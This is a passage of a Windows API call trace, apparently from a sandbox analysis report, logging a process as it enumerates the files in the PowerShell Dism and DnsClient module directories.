lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psd1", cAlternateFileName="")) returned 1 [0264.778] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psm1", cAlternateFileName="")) returned 1 [0264.778] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.778] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0264.778] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 1 [0264.778] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 0 [0264.779] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.779] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1")) returned 0x20 [0264.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.779] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0264.779] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d [0264.779] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db140 [0264.780] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.780] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0264.780] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.780] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.780] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.780] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.781] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.781] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.781] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0264.781] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0264.781] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0264.782] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0264.782] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0264.782] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0264.782] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0264.782] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0264.782] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 0 [0264.783] FindClose (in: hFindFile=0x1a8db140 | out: hFindFile=0x1a8db140) returned 1 [0264.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.783] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0264.783] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d [0264.783] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.783] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.783] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0264.784] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.784] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.784] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.784] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.784] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.784] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.784] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0264.784] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0264.785] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0264.785] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0264.785] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0264.785] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0264.785] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0264.785] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0264.786] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.786] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.824] SetThreadErrorMode (dwNewMode=0x0, 